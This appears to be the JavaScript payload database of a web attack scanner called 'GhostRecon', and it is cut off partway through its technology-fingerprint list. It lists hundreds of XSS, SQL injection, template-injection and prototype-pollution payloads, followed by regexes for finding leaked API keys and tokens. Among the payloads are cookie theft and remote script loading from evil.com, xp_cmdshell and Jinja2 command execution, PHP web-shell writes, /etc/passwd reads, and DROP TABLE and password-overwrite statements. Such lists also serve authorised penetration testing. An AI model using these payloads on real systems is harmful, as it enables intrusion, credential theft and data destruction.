// ═══════════════════════════════════════════════════════════════
// GhostRecon Professional Payload Database
// 500+ XSS | 400+ SQLi | SSTI | Polyglot | Context-Aware
// ═══════════════════════════════════════════════════════════════

// ── XSS PAYLOADS ─────────────────────────────────────────────

const XSS_HTML_CONTEXT = [
  "<script>alert(1)</script>",
  '<script>alert("XSS")</script>',
  "<script>alert(`XSS`)</script>",
  "<script>confirm(1)</script>",
  "<script>prompt(1)</script>",
  "<script>alert(document.domain)</script>",
  "<script>alert(document.cookie)</script>",
  "<Script>alert(1)</Script>",
  "<SCRIPT>alert(1)</SCRIPT>",
  "<scr<script>ipt>alert(1)</scr</script>ipt>",
  '<script/src="data:,alert(1)">',
  "<script>alert(1)//\n</script>",
  "<script>alert(1)/*",
  "<<script>alert(1)</script>",
  "</script><script>alert(1)</script>",
  "</title><script>alert(1)</script>",
  "</textarea><script>alert(1)</script>",
  "</style><script>alert(1)</script>",
  "--><script>alert(1)</script>",
  "]]><script>alert(1)</script>",
];

const XSS_ATTR_CONTEXT = [
  '" onmouseover="alert(1)',
  "' onmouseover='alert(1)",
  '" onfocus="alert(1)" autofocus="',
  '" onclick="alert(1)',
  '" onload="alert(1)',
  '" onerror="alert(1)',
  '"><script>alert(1)</script>',
  "'><script>alert(1)</script>",
  '" onmouseover=alert(1) "',
  "' onmouseover=alert(1) '",
  "`onmouseover=alert(1)",
  '"><img src=x onerror=alert(1)>',
  "'><img src=x onerror=alert(1)>",
  '" autofocus onfocus=alert(1) "',
  "' autofocus onfocus=alert(1) '",
  '"></a><script>alert(1)</script><a "',
  '" style="background:url(javascript:alert(1))',
  "' style='background:url(javascript:alert(1))",
  '" tabindex=1 onfocus=alert(1) ',
  "' tabindex=1 onfocus=alert(1) ",
];

const XSS_JS_CONTEXT = [
  '"-alert(1)-"',
  "'-alert(1)-'",
  "`-alert(1)-`",
  ";alert(1)//",
  ";alert(1)/*",
  "</script><script>alert(1)</script>",
  '"-alert(1)-"',
  "';alert(1)//",
  '\\";alert(1)//',
  "${alert(1)}",
  "#{alert(1)}",
  "<\/script><script>alert(1)<\/script>",
  '"+alert(1)+"',
  "'+alert(1)+'",
  "`+alert(1)+`",
  "));alert(1)//",
  "]);alert(1)//",
  "}));alert(1)//",
  "\u003cscript\u003ealert(1)\u003c/script\u003e",
  "\x3cscript\x3ealert(1)\x3c/script\x3e",
];

const XSS_URL_CONTEXT = [
  "javascript:alert(1)",
  'javascript:alert("XSS")',
  "javascript:confirm(1)",
  "javascript:prompt(1)",
  "javascript&#58;alert(1)",
  "javascript&#x3A;alert(1)",
  "javascript\x3aalert(1)",
  "javascript\u003aalert(1)",
  "data:text/html,<script>alert(1)</script>",
  "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
  "vbscript:alert(1)",
  "java\nscript:alert(1)",
  "java\tscript:alert(1)",
  "java\rscript:alert(1)",
  "\x6aavascript:alert(1)",
  "java%0ascript:alert(1)",
  "java%09script:alert(1)",
  "&#106;avascript:alert(1)",
  "j\u0061vascript:alert(1)",
  "%6aavascript:alert(1)",
];

const XSS_EVENT_HANDLERS = [
  "<img src=x onerror=alert(1)>",
  '<img src=x onerror="alert(1)">',
  "<img src='x' onerror='alert(1)'>",
  "<img src=x onerror=alert`1`>",
  "<img src=x onerror=alert(document.cookie)>",
  "<svg onload=alert(1)>",
  '<svg onload="alert(1)">',
  "<svg/onload=alert(1)>",
  "<svg\nonload=alert(1)>",
  "<body onload=alert(1)>",
  "<body/onload=alert(1)>",
  "<input autofocus onfocus=alert(1)>",
  "<select autofocus onfocus=alert(1)>",
  "<textarea autofocus onfocus=alert(1)>",
  "<keygen autofocus onfocus=alert(1)>",
  "<video src=x onerror=alert(1)>",
  "<audio src=x onerror=alert(1)>",
  "<details open ontoggle=alert(1)>",
  "<marquee onstart=alert(1)>",
  "<meter onmouseover=alert(1)>1</meter>",
  '<object data="javascript:alert(1)">',
  '<iframe src="javascript:alert(1)">',
  "<iframe onload=alert(1)>",
  "<form><button formaction=javascript:alert(1)>click",
  "<math><mtext></table><img src=x onerror=alert(1)>",
  "<isindex type=image src=1 onerror=alert(1)>",
  '<link rel=import href="data:text/html,<script>alert(1)</script>">',
  "<script src=data:,alert(1)>",
  '<div onmouseover="alert(1)">hover</div>',
  '<a href="javascript:alert(1)">click</a>',
];

const XSS_BYPASS_WAF = [
  "<ScRiPt>alert(1)</sCrIpT>",
  "<script >alert(1)</script >",
  "<script\t>alert(1)</script>",
  "<script\n>alert(1)</script>",
  "<%73cript>alert(1)</%73cript>",
  "<scr\x00ipt>alert(1)</scr\x00ipt>",
  "<s\u0063ript>alert(1)</s\u0063ript>",
  "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
  "&lt;script&gt;alert(1)&lt;/script&gt;",
  "%3Cscript%3Ealert(1)%3C%2Fscript%3E",
  "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",
  "<script>al\u0065rt(1)</script>",
  "<script>ale\x72t(1)</script>",
  "<svg><script>alert(1)</script></svg>",
  "<math><script>alert(1)</script></math>",
  "<table><script>alert(1)</script></table>",
  "<div><script>alert(1)</script></div>",
  "<p><script>alert(1)</script></p>",
  "<a><script>alert(1)</script></a>",
  "<b><script>alert(1)</script></b>",
  "<i><script>alert(1)</script></i>",
  "<u><script>alert(1)</script></u>",
  "<s><script>alert(1)</script></s>",
  "<em><script>alert(1)</script></em>",
  "<strong><script>alert(1)</script></strong>",
  '<img src="x:x" onerror="alert(1)">',
  "<img src=`x` onerror=`alert(1)`>",
  '<img """><script>alert(1)</script>">',
  "<img src=/ onerror=alert(1)//\n>",
  "<img src=x:alert(alt) onerror=eval(src)>",
  "<<img src=x onerror=alert(1)//>",
  "<img src=x onerror=\ralert(1)>",
  "<img src=x onerror=\nalert(1)>",
  "<img src=x onerror=\talert(1)>",
  "<IMG SRC=x OnErRoR=alert(1)>",
  '<IMG SRC="javascript:alert(1);">',
  "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
  "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
  "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000049&#0000041>",
];

const XSS_POLYGLOT = [
  "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e",
  '"><img src=1 href=1 onerror="javascript:alert(1)"></img>',
  "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">')><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
  "`-alert(1)-`",
  "');alert(1);//",
  "//';alert(1)//",
  "<script ~~~>alert(1)</script ~~~>",
  "expression(alert(1))",
  "-expression(alert(1))",
  "a=alert,a(1)",
  "[1].find(alert)",
  "alert`1`",
  "(alert)(1)",
  "a=alert;a(1)",
  "void alert(1)",
  "typeof alert(1)",
  "new Function`alert\`1\``()",
  "Set.constructor`alert\`1\``()",
  "[].constructor.constructor`alert\`1\``()",
];

const XSS_DOM_BASED = [
  "#<script>alert(1)</script>",
  '#"><script>alert(1)</script>',
  "#'><script>alert(1)</script>",
  "#<img src=x onerror=alert(1)>",
  "#javascript:alert(1)",
  "?next=javascript:alert(1)",
  "?url=javascript:alert(1)",
  "?redirect=javascript:alert(1)",
  "?callback=alert(1)",
  "?jsonp=alert(1)",
  "?q=<script>alert(1)</script>",
  "?search=<img src=x onerror=alert(1)>",
  "#\x3Cscript\x3Ealert(1)\x3C/script\x3E",
  "#%3Cscript%3Ealert(1)%3C/script%3E",
  "#&lt;script&gt;alert(1)&lt;/script&gt;",
];

const XSS_CSP_BYPASS = [
  '<script nonce="RANDOM">alert(1)</script>',
  '<base href="https://evil.com">',
  '<link rel=prefetch href="https://evil.com/steal?c="+document.cookie>',
  '<meta http-equiv="refresh" content="0;url=javascript:alert(1)">',
  '<object data="data:text/html,<script>alert(1)</script>">',
  '<embed src="data:text/html,<script>alert(1)</script>">',
  '<iframe srcdoc="<script>alert(1)</script>">',
  '<script src="https://evil.com/xss.js"></script>',
  '<script>import("https://evil.com/xss.js")</script>',
  "<img src=x onerror=\"import('https://evil.com/xss.js')\">",
];

// Combine all XSS payloads
const ALL_XSS_PAYLOADS = [
  ...XSS_HTML_CONTEXT,
  ...XSS_ATTR_CONTEXT,
  ...XSS_JS_CONTEXT,
  ...XSS_URL_CONTEXT,
  ...XSS_EVENT_HANDLERS,
  ...XSS_BYPASS_WAF,
  ...XSS_POLYGLOT,
  ...XSS_DOM_BASED,
  ...XSS_CSP_BYPASS,
];

// ── SQL INJECTION PAYLOADS ────────────────────────────────────

const SQLI_ERROR_BASED = [
  "'",
  "''",
  "`",
  "``",
  ",",
  '"',
  '""',
  "\\",
  "\\\\",
  "--",
  "-- -",
  "#",
  "/**/",
  "/*!*/",
  "' OR '1'='1",
  "' OR '1'='1'--",
  "' OR '1'='1'#",
  "' OR '1'='1'/*",
  '" OR "1"="1',
  '" OR "1"="1"--',
  "1' OR '1'='1",
  "1 OR 1=1",
  "1' OR 1=1--",
  "1; SELECT 1",
  "' OR 1=1--",
  "' OR 1=1#",
  "' OR 1=1/*",
  "admin'--",
  "admin'#",
  "admin'/*",
  "' HAVING 1=1--",
  "' GROUP BY 1--",
  "1' GROUP BY 1--",
  "' ORDER BY 1--",
  "1' ORDER BY 1--",
  "1' ORDER BY 2--",
  "1' ORDER BY 3--",
  "1' ORDER BY 100--",
  "' UNION SELECT NULL--",
  "' UNION SELECT NULL,NULL--",
  "' UNION SELECT NULL,NULL,NULL--",
  "1 UNION SELECT NULL--",
  "1 UNION SELECT NULL,NULL--",
  "1 UNION ALL SELECT NULL--",
  "' UNION ALL SELECT NULL--",
  "') UNION SELECT NULL--",
  "')) UNION SELECT NULL--",
];

const SQLI_MYSQL = [
  "' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
  "' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)--",
  "' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(VERSION(),0x3a,FLOOR(RAND()*2))x FROM information_schema.columns GROUP BY x)--",
  "1 AND EXP(~(SELECT * FROM (SELECT VERSION())x))",
  "' AND GTID_SUBSET(CONCAT(0x7e,VERSION()),1)--",
  "' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7e,VERSION())) USING utf8)))--",
  "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
  "' PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x3a,VERSION())),1)--",
  "SELECT * FROM users WHERE id=1 AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))",
  "1; SHOW TABLES--",
  "1; SHOW DATABASES--",
  "1; SELECT table_name FROM information_schema.tables--",
  "1; SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
  "1; SELECT user,password FROM mysql.user--",
  "1; SELECT @@version--",
  "1; SELECT @@datadir--",
  "1; SELECT user()--",
  "1; SELECT database()--",
  "1; SELECT load_file('/etc/passwd')--",
  "1; SELECT 1 INTO OUTFILE '/var/www/html/shell.php'--",
];

const SQLI_MSSQL = [
  "'; EXEC xp_cmdshell('whoami')--",
  "'; EXEC xp_cmdshell('dir')--",
  "1; SELECT @@version--",
  "1; SELECT name FROM master.dbo.sysdatabases--",
  "1; SELECT name FROM sysobjects WHERE xtype='U'--",
  "1; SELECT name FROM syscolumns WHERE id=OBJECT_ID('users')--",
  "' AND 1=CONVERT(int,(SELECT TOP 1 name FROM master.dbo.sysdatabases))--",
  "'; WAITFOR DELAY '0:0:5'--",
  "1; WAITFOR DELAY '0:0:5'--",
  "'; IF (1=1) WAITFOR DELAY '0:0:5'--",
  "1; IF (SELECT COUNT(*) FROM users)>0 WAITFOR DELAY '0:0:5'--",
  "'; DECLARE @q NVARCHAR(4000);SET @q=N'xp_cmdshell ''whoami''';EXEC(@q)--",
  "1; SELECT * FROM OPENROWSET('SQLOLEDB','server=evil.com;uid=sa;pwd=','SELECT 1')--",
  "1; EXEC sp_makewebtask 'c:\\inetpub\\wwwroot\\shell.asp','SELECT ''<%execute(request(\"c\"))%>'''--",
  "1; BULK INSERT users FROM 'c:\\windows\\system32\\drivers\\etc\\hosts'--",
];

const SQLI_POSTGRESQL = [
  "'; SELECT version()--",
  "1; SELECT version()--",
  "'; SELECT current_database()--",
  "'; SELECT current_user--",
  "'; SELECT table_name FROM information_schema.tables--",
  "'; SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
  "'; COPY (SELECT '') TO PROGRAM 'id'--",
  "'; SELECT pg_sleep(5)--",
  "1; SELECT pg_sleep(5)--",
  "' AND 1=CAST((SELECT version()) AS int)--",
  "' AND 1=(SELECT 1 FROM pg_sleep(5))--",
  "'; CREATE OR REPLACE FUNCTION shell(text) RETURNS text AS $$ import subprocess;return subprocess.check_output(split(1)) $$ LANGUAGE plpythonu--",
  "1; SELECT lo_import('/etc/passwd')--",
  "'; COPY users TO '/tmp/users.csv'--",
  "1; SELECT chr(65)||chr(66)||chr(67)--",
];

const SQLI_ORACLE = [
  "' OR 1=1--",
  "1 AND 1=UTL_HTTP.REQUEST('http://evil.com/'||USER)",
  "' UNION SELECT NULL FROM DUAL--",
  "' UNION SELECT NULL,NULL FROM DUAL--",
  "' AND 1=CTXSYS.DRITHSX.SN(USER,(SELECT table_name FROM all_tables WHERE rownum=1))--",
  "1;SELECT UTL_FILE.FOPEN('DIRECTORY','file.txt','R') FROM DUAL--",
  "' AND (SELECT 1 FROM DUAL WHERE 1=1)='1",
  "1 AND ROWNUM=1 AND 1=TO_NUMBER(UTL_HTTP.REQUEST('http://evil.com/'))",
  "' OR 1=1 AND rownum=1--",
  "' UNION SELECT user FROM dual--",
  "1 UNION SELECT NULL,user,NULL FROM dual--",
  "' AND 1=dbms_pipe.receive_message('RDS$SYS_PIPE',5)--",
];

const SQLI_SQLITE = [
  "' UNION SELECT sqlite_version()--",
  "1; SELECT sqlite_version()--",
  "' UNION SELECT name FROM sqlite_master WHERE type='table'--",
  "' UNION SELECT sql FROM sqlite_master--",
  "1; DROP TABLE users--",
  "' AND 1=1--",
  "'; ATTACH DATABASE '/var/www/html/shell.php' AS shell; CREATE TABLE shell.exploit (webshell text); INSERT INTO shell.exploit VALUES('<?php system($_GET[c]); ?>')--",
  "1 UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table'--",
  "' UNION SELECT group_concat(sql) FROM sqlite_master--",
];

const SQLI_BLIND_TIME = [
  "' AND SLEEP(5)--",
  "1 AND SLEEP(5)--",
  "' OR SLEEP(5)--",
  "1' AND SLEEP(5) AND '1'='1",
  "1) AND SLEEP(5)--",
  "1)) AND SLEEP(5)--",
  "' AND SLEEP(5) AND '",
  "1; WAITFOR DELAY '0:0:5'--",
  "'; WAITFOR DELAY '0:0:5'--",
  "1); WAITFOR DELAY '0:0:5'--",
  "' AND pg_sleep(5)--",
  "1 AND pg_sleep(5)--",
  "1; SELECT pg_sleep(5)--",
  "' AND 1=(SELECT 1 FROM pg_sleep(5))--",
  "1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS$SYS_PIPE',5)--",
  "' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS$SYS_PIPE',5)--",
  "1 AND BENCHMARK(5000000,MD5(1))--",
  "' AND BENCHMARK(5000000,MD5(1))--",
  "1; SELECT RANDOMBLOB(500000000/2)--",
  "' OR RANDOMBLOB(500000000/2)--",
];

const SQLI_BLIND_BOOLEAN = [
  "' AND 1=1--",
  "' AND 1=2--",
  "1 AND 1=1--",
  "1 AND 1=2--",
  "' AND 'a'='a",
  "' AND 'a'='b",
  "1' AND '1'='1",
  "1' AND '1'='2",
  "' AND SUBSTRING(VERSION(),1,1)='5",
  "' AND ASCII(SUBSTRING(VERSION(),1,1))>52--",
  "1 AND (SELECT COUNT(*) FROM users)>0--",
  "1 AND (SELECT COUNT(*) FROM users)>100--",
  "' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a",
  "' AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a",
  "1 AND (SELECT 1 FROM users WHERE username='admin')=1--",
  "' OR (SELECT 1 FROM users WHERE username='admin' AND password LIKE 'a%')--",
];

const SQLI_UNION_BASED = [
  "' UNION SELECT 1--",
  "' UNION SELECT 1,2--",
  "' UNION SELECT 1,2,3--",
  "' UNION SELECT 1,2,3,4--",
  "' UNION SELECT 1,2,3,4,5--",
  "' UNION SELECT NULL--",
  "' UNION SELECT NULL,NULL--",
  "' UNION SELECT NULL,NULL,NULL--",
  "' UNION ALL SELECT 1--",
  "' UNION ALL SELECT 1,2--",
  "' UNION ALL SELECT 1,2,3--",
  "1 UNION SELECT @@version--",
  "1 UNION SELECT user()--",
  "1 UNION SELECT database()--",
  "1 UNION SELECT table_name FROM information_schema.tables--",
  "1 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x7573657273--",
  "1 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--",
  "1 UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--",
  "1 UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--",
  "' UNION SELECT 1,load_file('/etc/passwd'),3--",
];

const SQLI_STACKED = [
  "1; SELECT 1",
  "1; SELECT @@version",
  "1; SELECT user()",
  "1; DROP TABLE users",
  "1; CREATE TABLE hack(data text)",
  "1; INSERT INTO users VALUES('hack','hack')",
  "1; UPDATE users SET password='hacked' WHERE username='admin'",
  "1; DELETE FROM users",
  "'; EXEC sp_configure 'show advanced options',1--",
  "'; EXEC sp_configure 'xp_cmdshell',1--",
  "1; EXEC master..xp_cmdshell 'ping evil.com'",
];

const SQLI_WAF_BYPASS = [
  "' /*!OR*/ '1'='1",
  "' /*!50000OR*/ '1'='1",
  "' OR/**/1=1--",
  "' OR%091=1--",
  "' OR%0a1=1--",
  "' OR%0d1=1--",
  "' OR%091%3d1--",
  "'%20OR%201=1--",
  "' oR '1'='1",
  "' Or '1'='1",
  "' OR 1=1--",
  "'+OR+1=1--",
  "' OR 0x31=0x31--",
  "' OR char(49)=char(49)--",
  "' OR ASCII('a')=97--",
  "1 AND 1=1 UNION SELECT 1--",
  "1 AND 1=1/*!UNION*/SELECT 1--",
  "1 AND 1=1 UNION/*!*/SELECT 1--",
  "1 AND 1=1 UNION%23%0ASELECT 1--",
  "1 AND 1=1 UNION%0ASELECT 1--",
  "1 %55NION %53ELECT 1--",
  "1 UNiOn SeLeCt 1--",
  "1 UNION(SELECT 1)--",
  "1 UNION (SELECT 1)--",
  "1+UNION+SELECT+1--",
];

const SQLI_SECOND_ORDER = [
  "admin'--",
  "admin'#",
  "' OR 1=1-- -",
  "\\' OR 1=1-- -",
  "1\\' AND 1=1-- -",
  "' UNION SELECT 1-- -",
  "test' OR '1'='1",
  "'; DROP TABLE users-- -",
  "' AND SLEEP(5)-- -",
  "a\\' UNION SELECT 1,2,3-- -",
];

// Combine all SQLi payloads
const ALL_SQLI_PAYLOADS = [
  ...SQLI_ERROR_BASED,
  ...SQLI_MYSQL,
  ...SQLI_MSSQL,
  ...SQLI_POSTGRESQL,
  ...SQLI_ORACLE,
  ...SQLI_SQLITE,
  ...SQLI_BLIND_TIME,
  ...SQLI_BLIND_BOOLEAN,
  ...SQLI_UNION_BASED,
  ...SQLI_STACKED,
  ...SQLI_WAF_BYPASS,
  ...SQLI_SECOND_ORDER,
];

// ── SSTI PAYLOADS ─────────────────────────────────────────────

const SSTI_PAYLOADS = [
  // Detection — these evaluate to numbers if SSTI exists
  { payload: "{{7*7}}", expected: "49", engine: "Jinja2/Twig" },
  { payload: "${7*7}", expected: "49", engine: "Freemarker/Java EL" },
  { payload: "#{7*7}", expected: "49", engine: "Ruby ERB/Pebble" },
  { payload: "<%= 7*7 %>", expected: "49", engine: "Ruby ERB/EJS" },
  { payload: "*{7*7}", expected: "49", engine: "Spring SpEL" },
  { payload: "{{7*'7'}}", expected: "7777777", engine: "Jinja2" },
  { payload: "${7*'7'}", expected: "49", engine: "Twig" },
  { payload: "{{config}}", expected: "config", engine: "Jinja2" },
  { payload: "{{settings}}", expected: "settings", engine: "Django" },
  { payload: "{{request}}", expected: "request", engine: "Jinja2" },
  {
    payload:
      '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}',
    expected: "uid",
    engine: "Freemarker",
  },
  {
    payload:
      "${product.getClass().getProtectionDomain().getCodeSource().getLocation()}",
    expected: "file:",
    engine: "Java",
  },
  {
    payload: "{{''.__class__.__mro__[2].__subclasses__()}}",
    expected: "class",
    engine: "Jinja2 RCE",
  },
  {
    payload:
      "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}",
    expected: "uid",
    engine: "Jinja2 RCE",
  },
  {
    payload:
      "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
    expected: "uid",
    engine: "Jinja2 RCE",
  },
  { payload: "#{7*7}", expected: "49", engine: "Pebble" },
  { payload: "{7*7}", expected: "49", engine: "Smarty" },
  { payload: "{php}echo `id`;{/php}", expected: "uid", engine: "Smarty" },
  {
    payload: "{{7*7}}${7*7}#{7*7}<%= 7*7 %>",
    expected: "49",
    engine: "Polyglot",
  },
];

// ── PROTOTYPE POLLUTION PAYLOADS ──────────────────────────────

const PROTOTYPE_POLLUTION_PAYLOADS = [
  "__proto__[admin]=1",
  "__proto__[isAdmin]=true",
  "constructor[prototype][admin]=1",
  "__proto__.admin=1",
  "constructor.prototype.admin=1",
  '{"__proto__":{"admin":true}}',
  '{"constructor":{"prototype":{"admin":true}}}',
  "__proto__[polluted]=yes",
  "a[__proto__][b]=c",
  "__proto__[toString]=function(){return 1}",
];

// ── SECRET PATTERNS ───────────────────────────────────────────

const SECRET_PATTERNS = [
  {
    name: "AWS Access Key",
    pattern: /AKIA[0-9A-Z]{16}/g,
    severity: "Critical",
  },
  {
    name: "AWS Secret Key",
    pattern:
      /(?:aws|AWS)(?:_|-)?(?:secret|SECRET)(?:_|-)?(?:key|KEY)['":\s]*([A-Za-z0-9+/]{40})/g,
    severity: "Critical",
  },
  {
    name: "Google API Key",
    pattern: /AIza[0-9A-Za-z\-_]{35}/g,
    severity: "Critical",
  },
  {
    name: "Google OAuth",
    pattern: /[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com/g,
    severity: "High",
  },
  {
    name: "GitHub Token",
    pattern: /ghp_[a-zA-Z0-9]{36}/g,
    severity: "Critical",
  },
  {
    name: "GitHub OAuth",
    pattern: /gho_[a-zA-Z0-9]{36}/g,
    severity: "Critical",
  },
  {
    name: "Stripe API Key",
    pattern: /sk_live_[0-9a-zA-Z]{24}/g,
    severity: "Critical",
  },
  {
    name: "Stripe Publishable Key",
    pattern: /pk_live_[0-9a-zA-Z]{24}/g,
    severity: "Medium",
  },
  {
    name: "Razorpay Key",
    pattern: /rzp_live_[0-9a-zA-Z]{14}/g,
    severity: "Critical",
  },
  {
    name: "Slack Token",
    pattern: /xox[baprs]-[0-9]{12}-[0-9]{12}-[0-9a-zA-Z]{24}/g,
    severity: "High",
  },
  {
    name: "Slack Webhook",
    pattern:
      /https:\/\/hooks\.slack\.com\/services\/[A-Z0-9]{9}\/[A-Z0-9]{9}\/[a-zA-Z0-9]{24}/g,
    severity: "High",
  },
  { name: "Twilio API Key", pattern: /SK[0-9a-fA-F]{32}/g, severity: "High" },
  {
    name: "Twilio Auth Token",
    pattern: /(?:twilio|TWILIO)['":\s]*([0-9a-f]{32})/gi,
    severity: "Critical",
  },
  {
    name: "SendGrid API Key",
    pattern: /SG\.[a-zA-Z0-9\-_]{22}\.[a-zA-Z0-9\-_]{43}/g,
    severity: "High",
  },
  {
    name: "Firebase URL",
    pattern: /https:\/\/[a-z0-9-]+\.firebaseio\.com/g,
    severity: "Medium",
  },
  {
    name: "Firebase API Key",
    pattern: /(?:firebase|FIREBASE)['":\s]*([A-Za-z0-9_\-]{39})/gi,
    severity: "High",
  },
  {
    name: "JWT Token",
    pattern: /eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g,
    severity: "Medium",
  },
  {
    name: "Private Key",
    pattern: /-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/g,
    severity: "Critical",
  },
  {
    name: "Password in Code",
    pattern: /(?:password|passwd|pwd)['":\s=]+['"]([^'"]{8,})['"]/gi,
    severity: "High",
  },
  {
    name: "Database URL",
    pattern: /(?:mysql|postgresql|mongodb|redis):\/\/[^\s'"]+/gi,
    severity: "Critical",
  },
  {
    name: "Basic Auth in URL",
    pattern: /https?:\/\/[^:\s]+:[^@\s]+@[^\s]+/g,
    severity: "Critical",
  },
  {
    name: "Mailchimp API Key",
    pattern: /[0-9a-f]{32}-us[0-9]{1,2}/g,
    severity: "High",
  },
  {
    name: "Heroku API Key",
    pattern:
      /[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/g,
    severity: "High",
  },
  {
    name: "Cloudinary URL",
    pattern: /cloudinary:\/\/[0-9]+:[A-Za-z0-9\-_]+@[a-z]+/g,
    severity: "High",
  },
  {
    name: "PayPal Token",
    pattern: /access_token\$production\$[a-z0-9]+\$[a-f0-9]+/g,
    severity: "Critical",
  },
  {
    name: "Square Access Token",
    pattern: /sq0atp-[0-9A-Za-z\-_]{22}/g,
    severity: "Critical",
  },
  {
    name: "Telegram Bot Token",
    pattern: /[0-9]+:AA[0-9A-Za-z\-_]{33}/g,
    severity: "High",
  },
  { name: "NPM Token", pattern: /npm_[A-Za-z0-9]{36}/g, severity: "High" },
  {
    name: "Shopify Access Token",
    pattern: /shpat_[a-fA-F0-9]{32}/g,
    severity: "Critical",
  },
];

// ── TECHNOLOGY FINGERPRINTS ───────────────────────────────────

const TECH_FINGERPRINTS = [
  // Frameworks
  {
    name: "React",
    patterns: [
      "react.js",
      "react.min.js",
      "__REACT_DEVTOOLS",
      "data-reactroot",
      "data-reactid",
    ],
  },
  {
    name: "Vue.js",
    patterns: ["vue.js", "vue.min.js", "__vue__", "data-v-", "v-app"],
  },
  {
    name: "Angular",
    patterns: [
      "angular.js",
      "ng-app",
      "ng-controller",
      "ng-model",
      "angular.min.js",
    ],
  },
  {
    name: "jQuery",
    patterns: ["jquery.js", "jquery.min.js", "jQuery.fn.jquery", "$.fn.jquery"],
  },
  {
    name: "Bootstrap",
    patterns: ["bootstrap.css", "bootstrap.min.css", "bootstrap.js"],
  },
  {
    name: "Next.js",
    patterns: ["__NEXT_DATA__", "_next/static", "next/router"],
  },
  { name: "Nuxt.js", patterns: ["__NUXT__", "_nuxt/", "nuxt.js"] },
  { name: "Gatsby", patterns: ["gatsby-", "___gatsby", "gatsby-image"] },
  // CMS
  {
    name: "WordPress",
    patterns: ["wp-content", "wp-includes", "wp-json", "WordPress"],
  },
  { name: "Joomla", patterns: ["joomla", "/components/com_", "/modules/mod_"] },
  {
    name: "Drupal",
    patterns: ["drupal.js", "Drupal.settings", "/sites/default/files"],
  },
  { name: "Shopify", patterns: ["shopify", "Shopify.shop", "cdn.shopify.com"] },
  {
    name: "Magento",
    patterns: ["mage/", "Mage.", "skin/frontend", "/js/mage/"],
  },
  { name: "Wix", patterns: ["wix.com", "_wix_", "X-Wix-Published-Version"] },
  {
    name: "Squarespace",
    patterns: ["squarespace.com", "static.squarespace.com"],
  },
  { name: "Ghost", patterns: ["ghost.io", "ghost/", "content/themes"] },
  // Languages/Servers
  { name: "PHP", patterns: [".php", "X-Powered-By: PHP", "PHPSESSID"] },
  {
    name: "ASP.NET",
    patterns: ["__VIEWSTATE", "aspnetForm", ".aspx", "X-Powered-By: ASP.NET"],
  },
  {
    name: "Ruby on Rails",
    patterns: [
      "X-Powered-By: Phusion Passenger",
      "_rails_",
      "authenticity_token",
    ],
  },
  { name: "Django", patterns: ["csrfmiddlewaretoken", "django", "__admin__"] },
  {
    name: "Laravel",
    patterns: ["laravel_session", "X-Powered-By: PHP", "Laravel"],
  },
  { name: "Express.js", patterns: ["X-Powered-By: Express", "express"] },
  { name: "Spring", patterns: ["JSESSIONID", "Spring Framework", "spring"] },
  // CDN / Services
  { name: "Cloudflare", patterns: ["__cfduid", "cf-ray", "cloudflare"] },
  { name: "AWS CloudFront", patterns: ["X-Amz-Cf-Id", "cloudfront.net"] },
  {
    name: "Google Analytics",
    patterns: ["google-analytics.com", "ga.js", "analytics.js", "gtag"],
  },
  { name: "Google Tag Manager", patterns: ["googletagmanager.com", "gtm.js"] },
  { name: "Intercom", patterns: ["intercom.io", "intercomSettings"] },
  { name: "Hotjar", patterns: ["hotjar.com", "hj('stateChange"] },
  { name: "Sentry", patterns: ["sentry.io", "Sentry.init", "sentry_key"] },
  { name: "Stripe", patterns: ["stripe.com/v3", "Stripe(", "stripe.js"] },
  {
    name: "Razorpay",
    patterns: ["razorpay.com", "Razorpay(", "checkout.razorpay"],
  },
  // Security
  { name: "reCAPTCHA", patterns: ["recaptcha", "g-recaptcha", "grecaptcha"] },
  { name: "hCaptcha", patterns: ["hcaptcha.com", "h-captcha"] },
